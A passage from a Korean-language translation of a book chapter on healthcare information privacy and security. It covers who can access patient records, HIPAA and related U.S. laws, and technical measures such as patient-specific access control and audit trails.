• 환자를 접수하고 환자가 병 보이고 갈 때 다음번의 약속을 기록한 의사의 서 
기 나 접수담당자는 흉부투시를 약속한 내용까지 기록할수 있다. 

• 환자의 혈압과 기타 진찰사항들을 환자병력서에 적은 간호원 

• 환자병력서를 꺼내여 의사와 다음 치료시간을 확인하고 다시 서류철에 넣는 
병력서담당인원들 

• 인구분포별 및 보험별로 환자들의 림상정보를 편성하여 환자가 치료 받으러 
갈 때마다 료금서를 보험계획에 제출케 하는 료금계산원 

• 렌트겐의사 

• 렌트겐의사의 조수들 

• 환자를접수한 서기나접수원 

• 렌트겐투시를 실행 하는 기술자 

• 환자의 병력서작성을 담당한 필림담당자들 

• 인구분포별 및 보험별로 환자들의 림상정보를 편성하여 환자의 렌트겐투시후 
료금서를 작성하는 료금계산원 

• 렌트겐의사가 일하는 병원 

• 렌트겐투시할 때 사용자병원설비의 사용비를 보험에서 받기 위해 문건을 작 
성 하는 료금계산원을 포함한 업무일군들 

• 만일 진료의사가 이 병원의 성원이라면 또한 이 병원에서 그 환자의 병력서 
를 보관하고 있는 경우 추가병력서담당일군들 

• 약국 

• 환자의 이름，의사의 정보 및 처방과 관련한 사항을 다루는 서기 

• 처 방에 필요한 약을 해 당 항목에 적 어 넣는 약제사 

• 처방을 찾는 환자와 접촉하는 사무원 

• 치료비를 받기 위해 보험 자에게 환자정보를 제출하는 료금계산인원 

• 환자의 보험 회 사 

• 진료의사，렌트겐의사，병원，약국에서 각각 들어 온 청구서를 처리하는 청 
구서 처 리 인원들 

• 하나이상의 보험에 가입하였다면 때로 료금청구서가 다른 보험회사나 보험지 
사에도 가닿는다. 

이렇게 많은 사람들이 자기의 신상정보를 알고 있어 불안하기 시작하였는데 주민분 
포별 정보，보험정보，진단정보，림상검사정보，투약정보 등을 포함한 자기의 개인정보를 
쉽게 접할수 있는 아래의 보충적인 사람들을 생각한다면… 

• 대체로 병원에서 일하면서 정기적으로 기록을 후열하는 품질보증인원들 

• 병원설립을 허가한 국가기관이나 조직에서 병원에 대한 검열차로 내려 와 환자 
의 병력들을 읽어 볼수 있는 검열원들 
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• 자금모집 일 군들 

• 의사，병원，약국과는 별도의 판매 담당자들 및 판매회사들 

• 연구사업상 목적으로 환자의 상세한 병력정보를 리용할수 있는 연구사들 

이제는 그 환자의 상태가 악화되여 병원에 입원하였다고 보자. 환자정보를 아는 사 
탐들의 수는 요란하게 많아 진다. 

• 입원접수과인원들 

• 식당인원들 

• 간병원들 

• 병원의 모든 내과의사들 

• 의대 실 습생 들，간호실 습생 들 

• 약국성원들과 약학과실습생들 

• 사회사업 일군들과학생들 

• 환자입원내용을 전부 병원으로부터 보고 받는 국가기관들 

마지막으로 다른 하나의 껍질을 벗겨 보면 더 나온다. 

• 보건관계 자료기지，봉사기，망을 관리 하는 여 러 정보체계운영 자들 

• 고객 지 원체 계 를 제 공하는 여 러 콤퓨터 체 계 판매 자들 

• 계 3자업 무일 군들 례하면 

• 환자에 대한 의사의 기록을 옮겨 적어 열쇠 채워 보관하는 필사원들 

• 병원의 전자자료를 변환하여 보험회사에서 받아 볼수 있는 형태로 만드는 자 
료쎈터들 

• 법률회사들 

• 재정검사일군들 

그 환자가 단순한 호흡기질환이 있는것이 아니라 HIV (인간면역결핍 비루스)감염이 와 
서 앓는것이라면 어떻게 될것인가. 워싱톤시종합병원의 경우를 보자. 한 병원직원이 비밀 
을 지키지 못하여 한 환자의 HIV 상태 에 관한 내용이 환자의 동료들에 게 새 여 퍼졌다. 재 
관소는 이 병원이 환자에게 25만딸라의 보상을 낼것을 판결하였다. 

많은 사람들은 자기들이 가지고 있는 기록들에는 기밀적이거나 공개되면 혼란이 일 
어 나거 나 차별대우를 초래할만한것 이 없다고 하지만 그래도 거기 에는 기초적 으로 보호 
되여 기밀취급되거나 접근조종을 해야 할것도 있다. 결국 이것들은 다 정보보안의 기초 
틀거리에 속하는것이다. 

개 인들의 건강정보가 어떻 게 리용되며 퍼지는가 하는데 대 해서 알게 되는 경 우는 매 
우 드물며 일부 사람들에게 례외적으로 특정정보를 제한하는 특권을 주는 경우는 더욱 
드물다. 

이러한 정보공유는 사실상 대부분 합법적이거나 필수적이기도 하다. 치료를 잘 받으 
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려면 해 당 정보전체에 대한 치료관계자들의 접근이 허용되여야 한다. 치료비청구서를 받 
아 지불하기 위해서도 보험회사가 환자정보를 알아야 한다는것은 누구나 다 인정한다. 
그러나 보건산업이 그 문을 활짝 열어 놓음으로 하여 은연중 첫째로는 필요이상의 많은 
인원들이，둘째로는 필요이상의 많은 정보에 불필요하게 접근하게 되는것이다. 그리하여 
특전의 최소화라는 기밀정보보안원리가 위반되고 있다. 치료일군들은 알아야 하지만 그 
병원의 모든 치료일군들이 다 알 필요는 없을것이다. 보험회사들이 필요한 정보를 알아 
서 청구된 지불액이 합당하다는것을 확인할 필요가 있다는데 대해서는 리해되지만 오늘 
날처럼 그렇게 상세한 개인정보를 곡 알아야 할 필요가 있겠는가 하는것은 명백치 않다. 

최근까지만 해도 전반적인 보건산업에 공식적인 정보보안계획이 부족하였다. 여러가 
지 리유가 있다. 하나는 대량적으로 생기는 의료관계자료들이 상업적가치가 별로 없으므 
로 의료기관들이 정보도난대상으로 될것 갈지 않다는 견해이다. 개인병력들이 외부에 왕 
왕 류실되는 경우들은 있었지만 보건부문에서는 이것들을 례외적인것으로 보았다. 유명 
한 정구선수 아씨 애쉬는 자기 가 HIV 양성 반응이 라는 실태 를 비밀에 붙이 기 위해 온갖 
고생을 하였지만 한 의료일군이 보도계에 그것을 루설하고 말았다. 개 인들의 사적비밀이 
침해되는 실례는 자주 일어 나지만 밝혀 지지 않을뿐아니라 환자에게 두렷한 그 어떤 손 
해도 주지 않는것은 사실이다. 이제 와서 야 사람들은 약상점들이 제 약회사들과 환자처방 
기록들을 함께 가진다는것을 알고는 놀라서 일반사람들의 의료기록을 담는 대용량자료기 
지 에 상업적 가치 가 충분히 있다고 보기 시 작하는것 갈다. 

병원을 비롯한 보건기관들은 전통적으로 륜리와 명예라는 일차적인 가치체계는 세워 
놓았지만 일 관성 있고 구체 성 있으며 규약으로 밝혀 진 기 술적 인 통제 는 실 시하지 못하 
였다. 결국 모든 의사들(덧붙여 보면 의사의 조수들까지 포함하여)은 륜리를 잘 지킨다， 
환자가 앓아 위기에 처할 때 환자정보를 누구도 막으려 하지 않는다는 체념이 존속되여 
왔다. 불행하게도 이러한 관점은 잘 맞지 않는다. 매 사람의 행동을 한 눈으로 볼수 있는 
자그마한 사무실에서는 몇가지 절차와 기술적통제만 덧붙이면 충분할지 모르나 보건기관 
이 커지고 기능이 많아 지게 된 조건에서 이런 관점만 가지고는 환자정보의 비밀성，무 
결성，사용성이 담보될수 없는것이다. 

치 료와 치 료비 지불에서 공식 적 인 건강정 보보안질서 의 부족으로 사람들이 불안해 하 
는데 다른 편에서의 개인정보의 2차적인 사용은 우리가 전혀 알지도 통제하지도 못하고 
있는 형편이다. 

《자료기지의 나라와 21세기 개인성의 사멸》이라는 책에서 씸슨 가핑켈이 신랄히 
주장하듯이 우리 매 사람에 대해서 그렇게 많은 정보가 수집되고 우리가 상상 못할 정도 
로 그렇 게 많은 분야에 서 그것 이 리용되 여 본적 은 일찌 기 없 었 다. 신원도난은 급격 히 성 
하는 범죄현상이다. 이 장에서는 언급되지 않지만 이 범죄현상에 대해서는 여러 곳에서 
자료를 얻 을수 있 다(법 무부 Web 싸이트 www.usdoj.gov 나 사회 보장국의 Web 싸이 트 
www.ssa.gov 등에서 신원도난문제 를 보라.). 매 일매 일 일 어 나는 사건과 사변들 그리 고 그 
파괴적후과에 대하여 다 명백히 알지는 못하지만 지금 어딘가에서는 사람들의 사적비밀 
이 매우 위험한 수준에서 위협 받고 있다는 의식은 상당히 높아 지고 있다. 

1999년 9월 월스트리 트져널과 ABC 방송사가 공동으로 21세 기 의 가장 큰 불안감이 
무엇인가에 대하여 여론조사를 해보았다. 경제적，정치적 및 환경적불안감이 먼저 떠오를 
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것 갈지만 가장 많은 응답이 인간의 사적비밀상실이 라고 하였다. 

보건분야에서는 이것이 무엇을 의미하는가. 이 우려가 우연치 않다는것을 보여 주는 
실례는 허다하다. 

• 의사의 정상검진을 받은후 플로리다주 오를란더우에 사는 한 녀성은 계약회사로 
부터 고콜레스테 롤치 료약을 소개 하는 편지 를 받았다(《 오를란더 우쎈터 널》잡지 
에 게재된 기사《의사에게 하는 말을 많은 사람들이 듣는다. 환자기록의 비밀이 
보장 못되여) 1997년 11월 30일 A 1 페지). 

• 지 방 보건 리 사회 에 서 일 하는 한 은행업 자는 환자정 보를 입 수하여 자기 은행 의 
대부정보와 비교해 보았다(《전국법률학보》1994년 5월 30일). 

• 한 정 신병치 료전문가에 대 한 협 잡건을 수사하던 과정 에 련방수사국은 환자들에 
대한 병력을 입수하게 되였다. 환자들중에서 자기네 련방수사국 직원 한명을 발 
견한후 근무비 적합으로 보고 압력 을 가해 조기 은뢰하게 하였 다. 후에 그는 근무 
적합으로 밝혀 졌 다. (《토스안젤스 타임 스》 기사《의사만 보는 병력서가 이젠 
아니 다)1998년 9월 1일 A 1 페지 ) 

이러한 현실은 보건분야에 부정적그늘을 던져 주고 있다. 한 의학자협회의 평의회 
성원인 도날드 파미싸노박사는《만일 환자가 자기 병력정보의 비밀이 보장된다고 믿지 
않으면 우리는 그에게서 진단에 필요한 정 보를 얻지 못할것 이 다.》라고 말하였다(《 보스 
런 글로브 매거진)2000년 9월 17일 7폐지). 

1999년 1월 프린씨런조사연구집 단이 캘리포니 아보건재 단이 의뢰한 조사를 벌리 고 
《 미 국성 인의 15%가 자기 개 인병 력정 보의 비밀을 지키 기 위해 비정상적 인 거 짓말을 하 
였다. 자기 비밀을 지 키기 위한 방도에는 자기의 건강을 크게 모험하는 행위들도 있었다. 
환자들은 지어 다른 의사들에게 찾아 가는것，기업주에게 알려 질가봐 아예 치료를 받으 
려고 하지 않는것，기왕력을 부정확하게 혹은 불완전하게 말하는것，의사에게 병명을 병 
력 서 에 쓰지 말라고 부탁하거 나 경 감해 서 약한 병 상태 에 있는것 으로 기 재할것 을 부탁하 
는것 등이 그들이 쓰는 수법들이다.》라고 밝혔다. 

보건분야에서 사적비밀과 신용이 부족한 현상은 법률을 통하여 마침내 가까스로 시 
정되고 있다. 


HIPAA 


1996년에 채 택된 《 보건보험공용 및 책 임 관계 법〉〉 ( HIPAA ) 에는 여 러 가지 목적 이 있 
는데 그중 하나는 보건체 계 에서 업 무기 관들사이 에 진행하는 전자거 래의 표준화를 추진하 
여 원가를 절 약하자는것 이 다. 그리하여 이 법 이 실시 되 면 개 별적 사람이 보험 계 획 에 드는 
경우와 치료비청구와 지불이 있게 되는 의료봉사를 받는 경우에 기업주, 제공자，지불자 
들의 공통의 고유식 별자들과 표준코드를 리용하여 표준화된 형 식의 전자기 록으로 해 당 


25 




정보들이 교환된다. 

표준화가 원가를 떨구지만 정보보안과 사적비밀보장에는 위협이 커진다는 사실을 국 
회 가 다행스럽 게 인식 하였 다. 예 전에 없이 개 인건강정 보들이 전자형 태 나 보통형 식 으로 
만들어 지고 있는 조건에서 임의의 사람이 우리의 정보를 불법입수하여 리용하기가 더 
쉬 워 졌 다. HIPAA 는 개 별적 인 형 식 화를 청산하였 으므로 모든 사람들은《 불투명 에 의한 
보안》이 라는 안전성의 일부를 잃게 된다. 자기 의사가 자기 건강정보를 알게 하는것 이 
직접적인 도움을 주지만 이 정보가 자기 기업주와 판매회사에 알려 지면 상당히 대가가 
크던지 아니면 곤경에 빠지게 된다. 

그리하여 국회 는 이 법 에 보안과 사적비 밀보장에 관한 요구사항들을 첨 부하였 다. 이 
법 은 보건성 에 정 보보안시 행세 칙 을 작성할것 을 위 임하였으며 그렇 지 않으면 보건성 이 개 
입 하여 사적비 밀보장시 행세 칙 을 작성하게 되 여 있 다. 수많은 보건사적비 밀보호안들이 위 
원회 에서 토론되 였지 만 국회 표결단계 까지 오른것 은 하나도 없 다. 결국 보안시 행세 칙 과 
함께 사적비밀보호세칙도 보건성이 떠맡게 되였다. 그러나 보건성도 권한이 제한되여 있 
는것만큼 자료변환기관과 법률상담회사 등 보건정보를 사용하는 많은 주요기관들은 자기 
의 권한행 사권밖이 므로 빼 놓고 다만 보건봉사제 공기 관들과 건강보험회 사들만 규제할수 
있는것 이 다. 그러 므로 국회 에 서 포괄적 인 건강사적비 밀 보호법 을 통과시 키 기전까지 는 우 
리 의 법 률적 보호장치 에 큰 구멍 이 나 있 는셈 이 다. 

HIPAA 의 사적비 밀 보호사항은 2000년 12월 에 완료되 였 으며 모든 관계 기 관들은 이 
사항을 2003년 2월까지 준수하게 되여 있다. 이 글을 출판하는 순간까지 HIPAA 에는 정 
보보안사항이 제안의 형식을 띠고 아퀴를 짓지 못한 상태로 있다. 

정보보안과 사적비밀규정세 칙들은 서로 어떤 관계에 있는가. 정 보보안전문가들은 일 
반적으로 정보보안이란 보호되여 있는 정보의 비밀성，무결성，사용성을 담보하는것이라 
고 정 의 하고 있 다. 보건분야에 서 비 밀 성 이 가장 큰 관심 을 끄는 리유는 바로 환자정 보가 
감정 적 으로 매 우 예 민한 문제 이 기때문이 다. HIPAA 보안사항의 작성 자들은 전반적범위의 
보안을 고려하여 전반적 인 정보보안계 획을 요구하였다. 결국 례를 들어 보면 실험검 사소 
견의 무결성과 알레르기반응소견의 사용성문제가 그 사람의 건강에 결정적으로 중요하게 
되였다는것이 아닌가! 

이 로부터 HIPAA 의 규제하에 들어 가는 모든 기 관들이 공식 적 인 정 보보안계 획 을 실 
행 해 야 할 책 임을 지 고 있는셈 이 다. 다른 한편으로 본다면 사적비밀보호개 념의 중요한 
초점은 개인에 귀착된다. 사적비밀보장법들은 개인정보접근과 통제와 관련하여 매 개인 
이 가지는 권리를 명시하며 이러한 권리를 보장하기 위하여 관계기관들이 준수해야 할 
의 무를 규제하는것 이 다. 사적비밀보장은 정 보보안을 필요로 하므로 많은 점 에서 이것은 
한 동전의 량면인셈 이다. 

적절하고도 설득력 있는 보건사적비밀보호법초안작성에서의 난점 을 예상하여 국회는 
보건장관에게 권고안을 제출할것을 요구하였다. 당시 보건장관이였던 도너 샬랄라는 1997 
년에 다섯 가지 원칙 에 기 초한 보고서 를 제 출하였 다. 이 다섯 가지 원칙 은 수십년전에 정 부 
가 이 미 작성 한《 공명 정 보관례》에 준한것 이 다. 

이 공명정 보관례 들은 《 공정한 신용보고법》의 기 초로 리용되 였다. 이 법은 사람들 
에 게 자기 들의 재 정신용보고서 를 은행 기 관들에 서 거 의 비 용없 이 평문으로 한부 구입하거 
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나 오유들을 솔직하게 수정 받을 권리를 주고 있다. 이 공명정보관례는 유럽과 일련의 
많은 나라들에서 사적 비밀보장의 법적토대로 되고 있다. 그러 나 미국에서는 사람들의 개 
인정보에 대하여 지나친 통제를 하는 정부의 위구심으로 하여 전면적 이며 련방적 인 사적 
비밀보장법의 채택운동이 1970년대에 무산되고 말았다. 

샬랄라의 5가지 원칙은 다음과 갈다. 

• 경계선 어느 한 목적을 위해 수집된 정보는 본인의 긴급동의가 없는 한 다른 목 
적에 사용될수 없다. 

• 소비자의 통제 개인은 자기에 대한 기록자료를 한부 가질 권리，그 기록에서 틀 
린 점을 수정할수 있는 권리，그 정보가 현재 어떻게 리용되고 있으며 그것을 
어느 기관들에 주었는가를 알 권리를 가진다. 

• 사회적의무 개인의 권리와 사회의 리익사이에는 공정한 균형이 있어야 한다(다 
른 말로 말하면 사적비밀에 대한 권리에는 절대성이 없다.). 

• 책임소재 이 규정들을 어길 경우 책임 있는자들은 법적제재를 받는다. 

• 안전보호 각 기관들은 개인자료로 판명되는 정보들을 책임지고 통제하고 보호할 
의무를 진다. 

마지 막원 칙 은 HIPAA 의 보안요구사항과 사적 비 밀 요구사항들사이 의 관계 를 리해하는 
데서 특별히 중요하다. 이것은 접근조종분야 같은데서 보안이 없는 비밀이란 생각할수 
없다는것을 명백히 보여 준다. 보건성 이 제 안한 HIPAA 의 사적비밀보호조항은 개 인의 건 
강정보에 로의 접근이 어 느 경우에 적 합하며 어 느 경우에 부당하며 또 어느 경 우에 명백 
한 동의가 필요한가 등을 밝히고 있다. 또한《필요의 최소화》보안원리의 준수，재정검 
열흔적의 창조，종업원들에 대한 보안강습 등을 요구하고 있다. 이 규정들을 그대로 적용 
하면 상용보안 및 접근조종장치로 되여 기관의 공식적인 보안계획 즉 보안방책，보안절 
차，물리 적 및 기 술적 보안통제，보안교육 등을 세 워 놓을수 있 다. 실지 사적비 밀 보호조항 
은 넓은 의미에서 보면 안전담보장치의 필요성을 재확인함으로써 HIPAA 에서 달리 취급 
된 보안조항의 요구들을 다 담고 있는것 으로 리해할수 있 다. 

환자의 사적비밀보호와 관련한 기타 법률 


1999년에 대통령은 일부 마음에 들지 않는 부분이 있었지만《그램-리치-블릴리법》 
( GLB ) 에 서 명하였 다. 이 법 에 의하여 보험，은행，중개 업 들사이 의 법 적장벽 이 다 무너 짐 
으로써 이 분야들사이에 정보를 통합 및 공유할수 있게 되였다. 이것으로 하여 풍부한 
시 장호기 가 있 을것 이 라고 하지 만 그러 나 이 GLB 의 사적비 밀 보호사항에 도 불구하고 개 인 
들은 자기 들의 상세한 사적 인 정 보와 지 어 건강정 보의 공유에 대 하여 통제 권을 얼 마 가 
지지 못할것이다. 대통령 이 개 인들에게 보다 큰 통제권을 주겠다고 공약하였으나 HIPAA 
사적 비밀조항에 의하여 건강자료에 대 해서 는 얼마나 통제권을 가지 게 되 겠는지 . 
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1995 년 엘렌 앨더맨과 캐롤린 케네디 두 변호사가 쓴 《사적비밀보호의 권리》에서 
보여 주듯이 전국적 으로 볼 때 사례적 인 법률 및 사적비밀보호문제 에서의 결과들은 일관 
하지 않다. 그러 나 1991년부터 시 작된 프린씨 런보건쎈터 와 HIV (인간면역 결핍비 루스)양성 
으로 나타난 그곳 한 의사를 둘러 싼 사건이 던져 주는 의미는 크다. 법정에서는 그 의 
사에 대한 치료의무가 없음에도 불구하고 그의 병력을 조회해 본 쎈터직원들이 그 의사 
의 사적비밀권을 침해한것으로 판결하였다. 다시 말하여 직무상《알아야 할 필요성》이 
외의 목적으로 그의 정보를 뒤져 보았다는것이다. 법정은 이것을 사적비밀에 대한 침해 
로 규정하였 다. 이 사건은 정 보보안분야의 일 군에 게 정 보보안의 기 본사상을 확증해 준다. 

HIPAA 가 출현하고 보안과 기술령 역에서의 법 관들과 변호사들이 점 차 정 교화됨 에 
따라 이러한 법적상소건들이 더 많을것으로 생각된다. 

새로운 사적비밀보호법과 규정의 준수와 관련한 기술적난점 


모든 보건기 관들이 HIPAA 보안 및 사적비 밀보호요구사항들을 세 밀히 분석해 본 결과 
기술적 으로 준수하기 힘든 문제들이 여 러 군데 에서 나타나고 있다. 

세부적접근조종에서의 난관 

현재 제기되 고 있는 기술적난관의 하나는 허용된 사용자의 접근을 제한하는 응용 
프로그람에서 충분히 세분화된 조종이 부족한것이다. 이 문제는 여러가지 측면을 담고 
있 다. 

첫째로, 지금까지 오래동안 직무에 기초한 접근조종을 통하여 기능이나 자료형태별 
로 접근을 통제하는 체 계 들이 리용되 여 왔으므로 어떤 특정한 환자에 대 해서 만 접근을 
제 한하는 알고리 듬을 개 발하기 는 힘 들다. 례하면 환자주소나 보험계 획자료를 기 록하거 나 
시 간갱 신하자면 환자등록담당자들이 지 역별 환자자료와 보험자료를 보아야 하는것 이 정 
상이다. 그러나 환자의 실험소견이나 환자상태에 대한 담당의사의 기록에 대해서는 접근 
하지 못한다. 다른 한편 환자등록담당자들은 그 병원에 있는 모든 환자들의 지역분포별 
및 보험자료들을 다 보게 된다. 그런 정 보들이 력 사적 으로 보관되 였기 때 문에 등록담당자 
는 그러한 개인정보를 수천건이나 볼수 있게 된다. 그런 정보들은 대개 그리 기밀적인 
성격이 없는것으로 본다. 사람들의 이름，주소，전화번호들은 전화번호책에도 출판되여 
나와 있으며 대부분의 사람들은 자기 가 든 보험계 획의 이름을 비밀에 붙이지 않고 있다. 
그런데 이 정보들은 HIPAA 의 완전한 보호밑에 들어 가 있으며 보호하지 않으면 사람들 
을 위험 에 빠뜨릴수 있다. 남편에게 두들겨 맞고 도망쳐 숨어서 치료의 손길을 청하는 
녀성이 있다고 보자. 자기에게 와서 치료해 주려는 의사에게 자기 집주소를 기꺼이 보낸 
다. 그 녀성은 이 정보를 비밀에 붙이고 자기 남편에게 이것이 루설되지 않기를 응당 바 
란다. 

세분적접근조종이 더 곤난한 점은 환자의 실제 의료정보인 진단，실험결과，의사소견， 
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수술 및 기 타 절차，복용한 약명세 등에 대 한 넓은 접근에서 볼수 있다. 병원의 모든 의 
사들과 그 보조성원들이 수천 지어 수백만건에 달하는 환자기록들인 력사적으로 된 자료 
기지에 접근할수 있는것은 비정상적인것이 아니다. 의대실습생들과 료금계산 및 의료기 
륵과 관계되는 수많은 인원들도 마찬가지이다. 

이러한 경우에 의료기관들에서는 위험을 인식하며 모든것이 그 보안체계판매자들에 
게 달려 있으며 그들의 제품들에 더 엄격한 통제기능이 없어서 그럴수밖에 없다고 말한 
다. 미흡한 체계의 보안을 위해 일부 기관들에서는 보안방책，보안공정，보안강습 등의 
보상조치들을 강구하기도 한다. 보건기관들에서 일하는 근무자들에게 직무상 알 필요성 
이 없으면 정보에 접근하지 않겠다는 기밀보장합의서에 서명시키는것은 보통일로 되고 
있다. 많은 기관들은 그것으로 자기 기관이 보건정보비밀성을 지 킬 의무를 충분히 수행 
하고 있는것으로 자기만족에 빠져 있는것이다. 

사실 이 문제는 소홀히 대할 문제가 아니다. 자그마한 보건기관이라면 문제가 명백 
하나 학술적인 의료센터，더 나아가서 가장 복잡한 전문종합병원 갈은데서는 많은 성원 
들중 어느 전문일군들，어느 보조성원들，어느 업무 및 행정일군들이 어느 환자의 병력에 
접 근하였 는가를 통제 한다는것 은 정 말 불가능하다. 

이러한 현상은 체계전문설계가들로 하여금 흥분되여 창조적인 방안들을 개발하게 하 
고 있다. 실례로 영국에서 케임브리쥐대학의 로쓰 제이 엔더슨박사가 개발하여 여러 병 
원들에서 응용되고 있는 새로운 체계는 환자별로 구별되는 접근조종목록 ( ACL ) 을 쓰고 
있 다. 이 ACL 은 환자의 담당진료의 사가 관리하는데 의 사는 실례 로 이 목록에 협 의진단 
에 필요한 전문가들의 이름을 림시로 추가하기도 한다. 보조성원들은 해당 담당의사들과 
련결시킴으로써 해당한 접근을 가지게 한다. 

해당 환자와의 관계에 기초하여 이와 류사한 정황별 접근조종해결방식을 개발할수 
있다. 실례로 여러 보건계획들에서는 환자치료사업을 위한 첫 입구문지기로 진료의사를 
지정할것 을 요구하고 있다. 보건실천에서 는 이 렇게 진료의사와 협의의사를 지정하거 나 
혹은 고정할것 을 요구하고 있다. 그래서 입 원체 계 에서 입 원환자를 제 기하는 의 사，입 원환 
자를 받는 의사，입원환자를 담당할 의사 등을 지정하는 체계 가 오랜기간 존속되 여 왔다. 
그리하여 표준적 인 역 할별 접 근조종외 에 도 대 상환자에 대 한 매 의 료인원들의 접 근을 보 
다 제한할수 있다. 그러나 해결방안들은 행정적으로 관리하기 쉬워야 하며 정보에 대하 
여 많이 접근하는 비전문가들에 대해서도 반드시 적용되여야 할것이다. 

개략적인 알고리듬이 개발되여 환자전체에 대한 부분적인 세부항목들이 규정되였다 
하더라도《유리창깨기》기법이 쉽게 적용될수 있다. 이 과정을 본다면 다음과 갈다. 자 
기 담당이 아닌 환자에 대한 기록에 의사가 접근할 필요가 있을 때 《이 환자기록을 정 
말 보시 렵 니 까? 이 접근은 기 록되 고 검 열됩 니다.》라는 식의 경 고문이 화면에 나오게 할 
수 있다. 의사가 계속하여 환자기록에 접근하면 경보가 울린다. 가령 경고문이 보안담당 
자의 휴대 형호출기 에 보내 여 지거 나 계 속하여 다음날 업 무시 작전에 검 열기 록보고서 가 화 
면에 뚜렷이 현시될수도 있다. 

이 런 장치 가 있으면 비 법적 인 자료열 람에 강력한 제동기적 역할을 가할수 있을것 이 다. 

세 부적 접 근조종이 안고 있는 두번째 측면은 HIPAA 의 사적비 밀보호조항의 요구사항 
에 있다. 이 조항은 의료기관들이 매 환자에게 환자정보를 해당 약구입과 같은 특수한 
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경우 매번 사용허가를 받을것을 규제하고 있다. 환자들은 동의하였다가 후에 그 허가를 
취소하는 때도 있다. 이것은 열람리유가 약구입을 위한 판매관계라면 자료기지접근프로 
그람이 자료기지에 있는 매 환자의 기록자료에 자유롭게 접근할수 없게 할수도 있다는것 
을 시사해 준다. 기록자료를 복원하기전에 그 쏘프트웨어는 해당 환자의 명백한 의견을 
일정하게나마 확인하지 않으면 안된다. 이것은 기술적으로 볼 때 까다로운 문제가 아니 
지만 그 접근을 위한 리유를 밝히는 문제는 까다롭다. 흔히 보안체계에 미리 설정해 놓 
은 사용자의 역할에 기초하여 추측할수도 있을것이다. 실례로 사용자가 약품구입처에 근 
무하며 그에 따라 허가를 받은 상태 라면 그 접근의 목적 이 약품구입과 관련된것으로 추 
측판정할수 있다. 가장 명백한 례는 환자관리를 1차적인 역할로 하는 내과의사의 경우이 
지만 그가 행정 및 연구사업에 관여할수도 있는것이다. 일부 프로그람제작 및 판매업체 
에서는 이 문제를 해결하기 위하여 자료에 접근할 때 접근자에게 여러 항목중에서 접근 
리유를 찍어 선택할것을 요구하는 수법도 써보았다. 그러나 정보보안전문가나 검열자들 
의 눈에는 접근리유를 접근자자체가 선택하는것이 보안통제로 보일리 만무하다. 

환자준위의 후열 

우에서 본바와 같이 충분한 정도의 세부적접근조종이 부족한데다가 사람들이 가지고 
있는 호기심이라는 경향까지 겹쳐 사업상 허가를 받은 리유이외에도 많은 사람들이 비법 
적으로 환자정보를 여기저기 뒤져 보거나 찾아 보는 현상이 매일 벌어 지고 있다. 가장 
좋게 보면 이것을 자기 가족，친척，친우，동료에 대한 동정이나 우려때문이라고 할수도 
있다. 가장 나쁘게 보면 이것을 나쁜 목적이나 금전상의 리익을 노린것으로 볼수도 있다. 
《 국민의 료보장제 도》 (65 세 미 만의 저 소득자나 신체 장애 자를 위 한다는 보건제 도-역 주)의 
한 직원집단은 대상환자들의 재정원천에 대한 자료를 복사하여 산하 의료기관에 팔아 먹 
은것으로 하여 기소되 였다(잡지《포브스》1996년 5월 20일 252페지). 

이러한 행위는 분명히 보건기관들에 맡겨 진 자료의 비밀성 그리고 개별적환자의 사 
적비밀에 대 한 위협 으로 된다. 자료를 간단히 읽 어 보기 만 해도 환자에 게 극단한 해를 
주게 되는 보건기관인 경우 그 피해는 더없이 크다. 

망에서 자료뒤져보기 가 비 법적 으로 너무나 성 행한데 우려하여 병 원성원들자체 가 자 
기 병원에서 치료받기를 꺼려 하고 있는 실정에서 강력한 대책을 세워야 할 때는 왔다. 
수년전에 어느 한 병원에서는 이러한 페단을 막기 위하여 환자들에 의한 후열기능을 자 
기의 직결구내체계 에 추가하였 다. 그때 로부터 다른 병 원들과 일부 보건제품판매업 체들이 
이 귀중한 정보보안기능들을 자기들의 체계에 적용하기 시작하였다. 이 기능이 표준적인 
자료기지후열흔적 이 나 정 보변경기 록과 개 념상 다른 점은 접근하였던 정보가 변경되 였든 
변경 되 지 않았든 관계 없 이 모든 접 근이 전부 기 록된 다는 점 이 다. 둘째 로 자료기 지후열 흔 
적과는 달리 환자자료가 아닌이상 자료열람기록을 정확하게 하는것은 그리 중요하지 않 
다. 가령 한 사용자가 사업상 리유와는 관계없이 옆사람의 기록을 찾아 본다면 정보가 
얼 마나 중요한가에는 관계 없 이 보안규칙 은 깨 여 진것 이 나 다름 없 다. 

무단적 인 뒤 져 보기 는 하나의 근본적 인 사적비밀 침 해문제 로서 HIPAA 에서 는 의 료기 
관들에 환자들에 의한 후열 흔적 과 갈은 정 보보안기 법 을 통하여 이 문제 를 해 결 할것 을 촉 
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구하고 있다. 이 후열흔적을 리용하면 허용된것이든 허용되지 않은것이든 자기들의 정보 
가 어떻게 각이한 리유로 열람되였는가를 환자들에게 요구에 따라 통보해 줄수 있다. 

이 형태의 후열흔적에서 기술적문제로 나서는것은 성능과 보관의 영향 그리고 방대 
한 량의 후열흔적기록을 조사하는것이다. 이 형태의 후열흔적은 실천상 모든 환자들에게 
다 해당되여야지 어느 특정한 환자들에게만 해당되여서는 안된다. 그러므로 이 후열흔적 
기능을 잘 설계하지 않으면 전반 체계성능이 예상외로 떨어 질수 있다는것은 상상하기 
어렵지 않다. 류사한 문제로서 매 후열기록용량이 직결보관공간의 견지에서 고려되여야 
한다는것이다. 를퓨터능력과 보관의 가격이 떨어 지는데 따라 이것들은 그리 큰 문제로 
되지 않을것 이다. 그러나 남은 기술적문제는 방대한 량의 후열용자료들에서 람용건을 분 
석 하고 찾는 도구를 어 떻게 만드는가 하는 문제 이 다. HIPAA 의 조항에 의하면 문제 가 제 
기되면 이러한 후열흔적을 가지고 있는것만으로는 안되게 되여 있다. 즉 기관들이 이러 
한 파일 들을 사전행 동으로 미 리 조사해 보게 되 여 있 다. 그런 데 방대한 량의 적 합접 근건 
중에 서 비 적합접 근을 하나 찾아 내 는것 은 현재 간단한것 도 아니 며 또 흔히 하는것 도 아 
니다. 적 합접 근과 비 적합접 근을 구별해 낼수 있는 령리 한 려 과장치 가 필요한것 이 다. 

인테^트사용 

보건산업 이 인 터네 트를 일 정하게 놀랄 정 도로 광범 위하게 받아 들이 고 있는것 은 새 
기 술의 초기보급자로서의 명성 이 알려 지지 않아서 그것 을 회 복하느라고 그러는지 도 모 
른다. 어쨌든 인터네트가 한 기관이 여러 지역에 널려 있는 경우에 제공자와 지불자사이， 
궁극에는 기 업과 소비 자사이의 통신수단으로서 매우 유혹적 인것만은 사실이 다. 

오래동안 인정된 사실 이지 만 통신문이 암호화되 고 사용자들에 게 강력한 두 요소인증 
